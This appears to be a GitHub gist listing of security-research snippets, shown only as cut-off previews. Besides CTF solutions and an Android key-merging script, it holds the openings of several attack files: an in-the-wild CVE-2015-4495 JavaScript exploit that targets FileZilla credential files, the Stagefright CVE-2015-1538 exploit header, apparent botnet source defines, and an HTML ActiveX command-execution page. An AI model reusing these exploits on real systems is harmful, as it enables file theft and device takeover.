Toufik Airane toufik-airane

@toufik-airane
toufik-airane / airbus1.py
Last active September 12, 2015 23:24
Airbus Challenges 2014
#!/usr/bin/python
a = '\x3e\x5f\x1a\x3b\x53\x52\x30\x35\x13\x09\x1e'
b = 'Good boy :)'
print ''.join(chr(ord(i)^ord(j)) for i,j in zip(a,b))
# str().join(map(lambda x,y: chr(ord(x)^ord(y)),"string1","string2"))
toufik-airane / MainActivity.java
Last active August 29, 2015 14:23
Profile Class using Reflection
public class MainActivity extends ActionBarActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
Profiler p = new Profiler();
p.profileClass("com.android.internal.telephony.IccSmsInterfaceManager");
p.profileClass("com.android.internal.telephony.Phone");
toufik-airane / gen_keystore
Last active January 14, 2020 02:58
Merge .pk8 && .pem into .keystore ~ CyanogenMod APK System Privilege
#!/bin/sh
####
# Example :
# ./gen_keystore platform.x509.pem platform.pk8 android platform system.cyanogenmod.keystore
####
echo "$0 <.pem file> <.pk8 file> <password> <alias> <output>"
if test $# -ne 5; then
echo "[Error] Invalid arguments"
exit 1
fi
toufik-airane / opkg.conf
Created June 29, 2015 15:18
OpenWrt Barrier Breaker r41293
# OpenWrt Barrier Breaker r41293
dest root /
dest ram /tmp
lists_dir ext /var/opkg-lists
option overlay_root /overlay
src/gz barrier_breaker_base http://downloads.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/base/
src/gz barrier_breaker_luci http://downloads.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/luci/
src/gz barrier_breaker_management http://downloads.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/management/
src/gz barrier_breaker_oldpackages http://downloads.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/oldpackages/
src/gz barrier_breaker_packages http://downloads.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/packages/
toufik-airane / rev150.gdb
Last active January 3, 2017 14:14
Breizh CTF 2015
# BreizhCTF2015 Reverse me ! (150pts) Solution
shell python -c "print'a'*42" > /tmp/in
# cmp dl, al
b*0x080485c7
command
set $eax=$edx
append value /tmp/flag.log $eax
c
end
r < /tmp/in
// JS/Exploit.CVE-2015-4495
// This exploit has been found in the wild. I'm not the author (@tfairane).
{
clearInterval(intVal);
var q = queue(1);
var tasks = [];
var !os = navigator.platform;
if (os.search('Win') > -1) tasks = [function(callback) {
var interesting_apps = {
"FileZilla": ["filezilla.xml", "sitemanager.xml", "recentservers.xml"],
#!/usr/bin/env python
# Joshua J. Drake (@jduck) of ZIMPERIUM zLabs
# Shout outs to our friends at Optiv (formerly Accuvant Labs)
# (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015
# www.zimperium.com
#
# Exploit for RCE Vulnerability CVE-2015-1538 #1
# Integer Overflow in the libstagefright MP4 'stsc' atom handling
#
# Don't forget, the output of "create_mp4" can be delivered many ways!
// ___ __ _
// / \___ / _(_)_ __ ___ ___
// / /\ / _ \ |_| | '_ \ / _ \/ __|
// / /_// __/ _| | | | | __/\__ \
// /___,' \___|_| |_|_| |_|\___||___/
#define PR_SET_NAME 15
#define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *))
#define PAD_RIGHT 1
#define PAD_ZERO 2
<HTML>
<TITLE>Check for Windows updates from Command Line</TITLE>
<HEAD>
</HEAD>
<body><script language="javascript">
if ((window.name != "content") && (navigator.userAgent.indexOf("Opera") <= -1) )
document.write("<center><a href='index.html?page=doc.htm'>show framing</a></center>")
</script>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
toufik-airane / rhino.sandbox.warning.log
Last active November 12, 2015 16:30
Rhino Sandbox Warning
Problem when trying to get a Rhino object: java.lang.SecurityException: Illegal access in sandbox to public GlideScriptable GlideSystemUtilScript: com.glide.script.RhinoEnvironment.checkScriptableAccess(RhinoEnvironment.java:562)
com.glide.script.ARhinoScope.checkScriptableAccess(ARhinoScope.java:96)
com.glide.script.ARhinoScope.get(ARhinoScope.java:85)
com.glide.script.RhinoScope.get(RhinoScope.java:51)
com.glide.script.RhinoSandboxScope.get(RhinoSandboxScope.java:54)
org.mozilla.javascript.ScriptableObject.getProperty(ScriptableObject.java:1478)
org.mozilla.javascript.Context.newObject(Context.java:1098)
com.glide.script.RhinoObject.<init>(RhinoObject.java:57)
com.glide.script.RhinoObject.<init>(RhinoObject.java:49)
com.glide.script.GlideRhinoObject.<init>(GlideRhinoObject.java:39)